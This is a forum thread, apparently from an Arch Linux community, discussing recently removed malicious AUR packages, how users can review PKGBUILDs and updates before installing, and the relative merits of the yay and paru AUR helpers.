There’re things happening in the AUR:
I personally do believe that those packages hadn’t been installed that often, because you would have to actively search and install them, but it shows the dark side of the AUR once again.
For those that have missed it this was what happened.
Old news, not the first time, caught and removed … always read PKGBUILDs and dont rely on auto-builders like Chaotic.
Its an open repo where the public can freely upload.
If you use that blindly then you are asking for trouble.
Is there any kind of scanner that 1 can use to scan aur packages before installing it ?
You need to use your eyes, and I mean that in the kindest sense. The safest way to establish what you’re installing is :
- What do the diffs say? Have a look at the source if you’re able to understand the basics.
- Is it a new package? Does it have many votes?
- Do you need the package? Can it be found in extra?
The one between your eyes that should be able to understand that a PKGBUILD that is pulling data from a suspicious url such as megaupload isn’t a source you want to trust.
In other words, it’s not that simple to recognize for a novice.
Cool ,I’ll try look more carefully at any aur package.
Just thought (wished even) there might be some scanner that pickup stuff better than my un-knowledgeable eyes lol.
Another question , does this only apply to new aur packages 1 want to install, or can some f#ckr add malicious code to an existing aur that been installed before on my PC ?
Meaning if i run yay and it updates aur packages (already installed obviously) ,could those be compromised ?
Updates to packages are equally at risk. Assume that the AUR is unsafe. The U in AUR stands for User. Literally anybody can contribute to the repository. It’s a great place to get some amazing software, but balance that risk with your genuine needs.
Understood.
This is actually very worrisome…
As the Linux Market share increases so will the threats. One should always be diligent in what they allow on their system. Only install from the AUR if you are Confident in what your doing. However this is not limited to the AUR and one should always use caution when putting something on your system.
I don’t consider that incident to be that worrisome.
As the community reacted pretty quickly and the related packages have been removed from the AUR and there were also investigations into other packages which may include malicious code.
Yes thats the magic of opensourse in my opinion ,stuff gets picked up quick and fixed. My worry is if remote access were gained and maybe some backdoor was installed ,before a patch was made.
Maybe im just paranoid lol ,but i think i should be to some degree cause as was said ,threats increase on linux.
Just kinda wished there were a proper ‘antivirus/real time scanner’ for linux .
There is no need to be worried in case you haven’t actually installed those packages. Their naming was chosen to be similar to browser packages. And usually you wouldn’t have even stumbled upon them.
The only way to be free of risk is to install apps only from the official Arch repos. And even then, you can’t be 100% free of risk.
Having said that, alternative methods for installing apps, tools, kernels, and utilities are there for a reason. They give you the option to either install something not in the official repos or a newer version of the one present in the official repos. People use these methods all the time without issues. Whether AUR, Chaotic AUR, Flatpack, Appimage, themes/icons from the various stores (KDE, Gnome, Cinnamon, etc)… assume the risk, inspect what you’re downloading/installing, enjoy Arch.
As a side note, my personal use case. I am willing to take the risk:
- Arch repos for most things
- AUR (for apps not available via Arch)
- Flatpack (if an app fails or is available no other way)
- Appimage (as a last resort if something fails or is available no other way)
- Chaotic AUR (various kernels and Proton for Steam)
Makes me think of some meme i saw the other day
" i came to linux because its secure …now i cant even find my own files "
Something like that lol
Yea , i too only install from aur if its not available in arch repo ,and i really need the package.
I completely avoid flatpak and snap and appimage.
Never even heard of chaotic aur ,so thats good since i havent used it lol.
iv’e read up a little and Paru came up . What’s your guys thought on that ? Paru vs yay ?
https://www.slant.co/versus/23118/40125/~yay_vs_paru
edit: just found this thread too , haven’t read through it yet, it’s from 2021
I personally prefer paru over yay but I wouldn’t say it is “better”. They are very, very similar.
I prefer the way paru implements color and the review of diffs. I also like the implementation of paru -c for safely removing orphans without removing optional dependencies.
from what iv’e read up now a bit , it seems paru is “better”, anyhows , that’s probably another debate lol.
I now switched to paru anyway … 
Both are viable AUR helpers and essentially wrappers around pacman itself.
In comparison to yay, some operations of paru are considered to be unsafe. For instance paru -Sy in specific could result in an unresolved state that has to be fixed manually via pacman directly. But you should be fine when avoiding this option altogether.